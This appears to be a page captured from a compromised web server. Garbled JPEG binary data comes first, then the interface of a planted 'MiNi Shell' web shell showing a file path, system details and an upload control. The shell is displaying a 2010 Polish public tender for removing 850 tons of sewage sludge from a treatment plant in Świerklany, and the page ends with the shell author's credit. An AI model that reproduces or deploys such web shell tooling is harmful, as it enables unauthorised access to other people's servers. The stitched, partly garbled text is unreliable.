JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/55282-N-2010.html

<p class="kh_header"><b>Jankowice: WYWÓZ I ZAGOSPODAROWANIE OSADU ŚCIEKOWEGO W ILOŚCI 850 TON
Z OCZYSZCZALNI ŚCIEKÓW W ŚWIERKLANACH</b><br>
<b>Numer ogłoszenia: 55282 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zakład Wodociągów , ul. Świerklańska 54, 44-264 Jankowice, woj. śląskie, tel. 0-32 4229660, faks 0-32 4229662.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gzwswierklany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ I ZAGOSPODAROWANIE OSADU ŚCIEKOWEGO W ILOŚCI 850 TON
Z OCZYSZCZALNI ŚCIEKÓW W ŚWIERKLANACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia:

1. Załadunek, wywóz i zagospodarowanie osadu ściekowego odwodnionego na prasie filtracyjnej, zgromadzonego na składowisku osadu, o uwodnieniu ok. 85% w ilości ok. 850 ton, z oczyszczalni do miejsca przeznaczenia. 
Zagospodarowanie osadów nastąpi zgodnie z posiadanym zezwoleniem Wykonawcy (w przypadku unieszkodliwiania również zagospodarowanie ewentualnych produktów i odpadów tego procesu).
2. wywóz z terenu Oczyszczalni Ścieków przy ul. Pogodnej 5 w Świerklanach, odbędzie się w 2 etapach:
- (rozpoczęcie 1 etapu) w terminie do 5 dni roboczych od dnia podpisania umowy - 450 ton;
- (zakończenie 2 etapu) do 30 września 2010 r. - 400 ton (Wykonawca przystąpi do realizacji zlecenia w terminie uzgodnionym z Zamawiającym);
3. wywóz nie będzie trwał dłużej niż dwa dni robocze bezpośrednio po sobie następujące (w każdym etapie);
4. Wykonawca zapewni ładowarkę do załadunku osadu;
5. Wykonawca zleci na swój koszt  badanie gleby na którym ma być aplikowany osad, dawki osadu oraz miejsca stosowania i inne dane wynikające z przepisów, przed przekazaniem osadu do wykorzystania rolniczego (właścicielowi nieruchomości, dzierżawcy itp.), zgodnie z rozporządzeniem właściwego ministra właściwego ds. środowiska - jeżeli dotyczy.
6. Wykonawca opracuje analizę możliwości zastosowania komunalnych osadów ściekowych wytworzonych w Oczyszczalni Ścieków w Świerklanach do uprawy roślin - jeżeli dotyczy.
7. Po wykonaniu usługi wykonawca dostarczy zamawiającemu kartę aplikacji komunalnych osadów ściekowych (każdorazowo po odebraniu transportu osadu z terenu oczyszczalni Wykonawca wystawi kartę odpadu i przedstawi do zatwierdzenia przez Zamawiającego. Karta odpadu stanowić będzie podstawę do rozliczania wykonania usługi).                
8. Za składowanie i transport osadu ściekowego odebranego z GZW  odpowiada Wykonawca.
Transport Wykonawcy musi być przystosowany do przewozu osadów ściekowych, tj.: musi mieć zabezpieczenia uniemożliwiające zanieczyszczenia tras przejazdu, oraz być: dopuszczony do poruszania się po drogach, szczelny (nie powodować wycieków), stabilny (uniemożliwiający osuwanie się osadów oraz ewentualne ich pylenie), mieć ładowność i wytrzymałość przystosowaną do wywozu osadów i pozwalającą na ich odbiór z oczyszczalni w wymaganym terminie realizacji.
Wymagane zabezpieczenia dotyczące transportu określają stosowne normy techniczne, oraz prawo o ruchu drogowym, oraz wszelkie znane Wykonawcy okoliczności dotyczące warunków transportu osadów oraz warunków, jakich można się spodziewać na trasie przejazdu. Odbiór i transport osadu odbywa się będzie sprzętem Wykonawcy, dostosowanym do tego rodzaju ładunków.

9. Do powyższego postępowania mają zastosowanie przepisy ustawy z dnia 27 kwietnia 2001 r. o odpadach Dz.U.2001 Nr 62, poz.628, z późn. zm., oraz ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska Dz.U.2008 Nr 25, poz.150. (Osad powinien być zagospodarowany  rolniczo, przyrodniczo, składowany na wysypisku lub spalany w spalarniach zgodnie z ustawą o odpadach i przepisami wykonawczymi.)
10. Rozliczenie usługi odbędzie się 2 fakturami częściowymi (po wykonaniu każdego z 2 etapów), w ciągu 14 dni od dnia otrzymania faktury. Podstawę do wystawienia faktury stanowić będzie karta odpadu wystawiona przez Wykonawcę, potwierdzona przez przedstawiciela Zamawiającego.
Należności regulowane będą z konta Zamawiającego na konto wykonawcy wskazane w fakturze VAT. 
11. Maksymalna ilość osadu może okazać się mniejsza, co jest uzależnione od ilości wpływających do oczyszczalni ścieków. Faktyczna ilość osadu w ramach przedmiotu zamówienia będzie zależna od  ilości przetworzonych ścieków, a określenie w umowie maksymalnej ilości osadów, tj. 850 ton, w razie mniejszego zrealizowania, wynikającego ze zleceń Zamawiającego, nie będzie podstawą do finansowych roszczeń ze strony Wykonawcy.
12. Wykonawca w zakresie przedmiotu zamówienia dołączy do oferty: 
a) opis sposobu zagospodarowania ustabilizowanych komunalnych osadów ściekowych, wraz z podaniem miejsca wykorzystania osadów, zgodnie z załącznikiem do SIWZ, 
b) oświadczenie o stanie wykorzystania posiadanego zezwolenia, wraz z oświadczeniem, iż Wykonawca po przyjęciu całości przedmiotu niniejszego zamówienia nie naruszy zapisów posiadanego zezwolenia w zakresie ilości wskazanych w posiadanym zezwoleniu - dotyczy Wykonawców posiadających zezwolenie na odzysk lub unieszkodliwianie zgodnie z załącznikiem do SIWZ, 
c) Wykonawcy którzy przedstawią zezwolenie na zbieranie odpadów, składają oświadczenie, zgodnie z załącznikiem do SIWZ o: przekazywaniu odpadów w celu ich dalszego odzysku lub unieszkodliwiania, posiadaczom mającym zezwolenie na zbieranie, transport, odzysk lub unieszkodliwianie odpadów lub osobą w rozumieniu art. 43 ustawy o odpadach, zgodnie z art. 63 ustawy o odpadach posiadającą tytuł prawny do terenu na którym odpady są magazynowane. 
d) oświadczenie o zapewnieniu wykonania zamówienia na terenie województwa śląskiego zgodnie z art. 9 ust 3 ustawy o odpadach, z wyjątkiem określonym w art. 9 ust. 4 ustawy o odpadach - zgodnie z załącznikiem do SIWZ.
13. Zamawiający podczas realizacji zamówienia bezpłatnie udostępni Wykonawcy plac dla sprzętu Wykonawcy.
14. Zamawiający i Wykonawca przy pierwszym załadunku z każdego etapu, określą ilość osadu na łyżkę koparki i ilość łyżek jaka mieście się na jedną przyczepę, następnie 2 pierwsze samochody
w pierwszym dniu wywozu (w danym etapie), będą zważone na wadze zewnętrznej zlokalizowanej na ul. Świerklańskiej 51 (REMIX) w celu określenia średniego tonażu załadowanego osadu. 
Wykonawca zapewnia na swój koszt ważenie samochodów w powyższym zakresie.
Podczas realizacji każdego zlecenia Zamawiający zastrzega sobie możliwość ważeń kontrolnych na swój koszt, na zasadzie losowo wybranych dni ważenia oraz losowo wybranych samochodów do ważenia.
Jeżeli masa netto ważenia kontrolnego będzie niższa od masy przyjętej powyżej 10 procent, to masę netto do dalszych rozliczeń ustali się wyliczając średnią arytmetyczną z 2 kolejnych ważeń samochodów.
Podstawą do określenia ilości wywiezionych osadów będzie liczba kursów zgodnie z rejestrem prowadzonym przez Zamawiającego, pomnożona przez ustaloną przez strony masę osadu netto na samochodzie.
Przyjęta masa netto osadu na samochodzie będzie wpisywana w listach przewozowych jako masa ładunku netto.
Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiającego o zakończeniu realizacji danego etapu, co będzie podstawą do podjęcia czynności odbiorowych.
Po zakończeniu realizacji każdego etapu, Zamawiający na podstawie podpisanego Protokołu Odbioru wystawi Kartę Przekazania Odpadu zgodnie z obowiązującymi w danym momencie przepisami prawa. 
15. Podstawą uznania usługi, w zakresie danego zlecenia, za należycie wykonaną będzie podpisany przez Zamawiającego bez uwag i zastrzeżeń Protokół Odbioru wykonanego zakresu usługi wraz z wystawioną i podpisaną Kartą Przekazania Odpadów.
16. Sposób rozliczeń finansowych jest określony we wzorze umowy, stanowiący część IV SIWZ.
17. Wykonawca nie może powierzyć wykonywania zamówienia podwykonawcom, ze względu na specyfikę przedmiotu zamówienia w następującym zakresie:
1)prowadzenie działalności w zakresie transportu odpadów,
2)prowadzenie działalności w zakresie zbierania, odzysku lub unieszkodliwiania odpadów.
  
Zamawiający w ramach postępowania przekazuje Wykonawcom uczestniczącym w postępowaniu kartę badania osadu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.36.00-2, 90.51.37.00-3, 90.51.38.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert;
b) posiadanie aktualnego na czas trwania umowy, dokumentu zezwalającego na prowadzenie działalności w zakresie transportu odpadów, tj.: ustabilizowane komunalne osady ściekowe, wydanego przez właściwy organ,
c)posiadanie aktualnego na czas trwania umowy, dokumentu zezwalającego na prowadzenie działalności w zakresie zbierania, odzysku lub unieszkodliwiania odpadów, tj.: ustabilizowanych komunalnych osadów ściekowych, wydanego przez właściwy organ,;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykonali należycie podobne usługi lub wykonują podobne usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
za zamówienie podobne uważa się realizację 2 usług polegających na wywozie (w tym transport) oraz zagospodarowanie przedmiotu adekwatnego do części zamówienia w ilości  400 ton ton każda usługa;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gzwswierklany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zakład Wodociągów ul. Świerklańska 54; 44-264 Jankowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 10:00, miejsce: Gminny Zakład Wodociągów ul. Świerklańska 54; 44-264 Jankowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com